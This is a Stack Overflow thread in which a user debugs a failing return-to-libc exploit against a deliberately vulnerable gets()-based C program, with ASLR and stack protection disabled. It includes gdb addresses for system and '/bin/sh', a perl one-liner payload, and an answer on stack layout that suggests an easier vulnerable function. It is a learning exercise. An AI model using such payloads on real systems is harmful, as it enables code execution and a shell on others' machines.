# return to libc - problem

Tags: c, linux, stack-overflow, buffer-overflow, exploit

I'm having problems with return-to-libc exploit. The problem is that nothing happens, but no segmentation fault (and yes I'm actually overflowing the stack).

This is my program:

```
int main(int argc, char **argv) {
  char array[512];
  gets(array);
}
```

I'm using gets instead of strcopy, because my addresses start with 0x00 and strcpy thinks it's the end of a string, so I can't use it.

Here are the addresses that I need:

```
$ gdb main core
(gdb) p system
$1 = {<text variable, no debug info>} 0x179680 <system>
(gdb) p exit
$2 = {<text variable, no debug info>} 0x16f6e0 <exit>
(gdb)  x/s 0xbffffe3f
0xbffffe3f:      "/bin/sh"
```

When inputing the right sequence, this happens:

```
eleanor@eleanor32:~/testing/root$ perl -e 'print "\x41"x516 . "\x80\x96\x17\x00" . "\xe0\xf6\x16\x00" . "\x3f\xfe\xff\xbf"' | ./main
eleanor@eleanor32:~/testing/root$
```

so nothing.

But if I enter 520 'A's (0x41), then the EIP is overflown with 'A's. If there's 516 'A', nothing happens but EIP contains the system address, following the exit address, following the /bin/sh pointer.

Why nothing happened?

Comment: are you running this in an environment that uses ASLR?

Comment: Nope, /proc/sys/kernel/randomize_va_space has 0 (so it's disabled).

Comment: there are some other things to try in this question: http://stackoverflow.com/questions/1072224/practicing-buffer-overflow-attack-in-ubuntu

Comment: I have all of those protection mechanisms disabled, I've also compiled with the right flags as -fno-stack-protector, ... So there's no protection, I can overflow my EIP with no problems (I tested with overflowing with 'A's and it went ok). The problem is that the above exploit doesn't work, and I don't know why. Any hints would be appreciated. Did I do something wrong, do I have to put the system address in EIP-4 ?

Comment: either gets() stop reading the line when a '\x00' is read, or you're not overflowing enough the buffer ?

Comment: you should also check the stack address and the address of the buffer

Comment: gets() works with strings too. It will stop at 0x00, just like strcpy, use fread() for binary data.

Comment: looking at the assemble will help.

Comment: Your processor architecture? is the OS 32 bit?

Answer (score 3, accepted):

Let's do some asm before:

Code

```
$ cat gets.c
int main(int argc, char **argv) {
  char array[512];
  gets(array);
}
```

Asm

```
$ gcc gets.c -o getsA.s -S -fverbose-asm
$ cat gets.s
    ....
.globl main
        .type   main, @function
main:
        leal    4(%esp), %ecx   #,
        andl    $-16, %esp      #,
        pushl   -4(%ecx)        #  (1)
        pushl   %ebp            #  2
        movl    %esp, %ebp      #,
        pushl   %ecx            #  3
        subl    $516, %esp      #,
        leal    -516(%ebp), %eax        #, tmp60
        movl    %eax, (%esp)    # tmp60,
        call    gets            #  << break here  
        addl    $516, %esp      #,  << or here to see the stack picture
        popl    %ecx            #  (3')
        popl    %ebp            #  (2')
        leal    -4(%ecx), %esp  #  (1')
        ret
        .size   main, .-main
```

The prologue and epilogue (these are with alignment code) is described in detail here [Understanding the purpose of some assembly statements](https://stackoverflow.com/questions/4228261/understanding-the-purpose-of-some-assembly-statements/4228936#4228936)

Stack layout:

```
(char)  array[0]
...
(char)  array[511]
(32bit) $ecx - pushed by 3 - it was the address on the stack of the eip which main will return to
(32bit) $ebp - pushed by 2
(32bit) $esp - pushed by 1 - change the $esp to the original value
```

So, if you want to change a return address of main, you should not to change address in stack which will be used by `ret`, but also to repeat the values saved in stack by (1),(2),(3) pushes. Or you can embed a new return address in the array itself and overwrite only (3) by the your new stack address+4. (use 516 byte string)

I suggest you use this source code to hack it:

```
$ cat getss.c
f()
{
  char array[512];
  gets(array);
}
int main(int argc, char **argv) {
    f();
}
```

because f have no problems with stack realignement

```
.globl f
        .type   f, @function
f:
        pushl   %ebp    #
        movl    %esp, %ebp      #,
        subl    $520, %esp      #,
        leal    -512(%ebp), %eax        #, tmp59
        movl    %eax, (%esp)    # tmp59,
        call    gets    #
        leave
        ret
        .size   f, .-f
```

Stack layout for `f()`:

```
(char)  array[0]
...
(char)  array[511]
(32bit) old ebp
(32bit) return address
```

Breakpoint at ret instruction in f() with 520 bytes of "A"

```
(gdb) x/w $sp
0xXXXXXa3c:     0x41414141
```

Comment: Hi. I know how stack works, and I know about stack alignment, and that's not the problem, because I've calculated all that also. The problem is that I cannot save the \x00 on the stack, since it's the '\0' character.

Comment: @user620429, I think, you are wrong and gets allows to save a `\0` char in the string. ('d Checked glibc sources).

Comment: @user620429, There is shown that `gets` does read of zero bytes http://stackoverflow.com/q/5068278/196561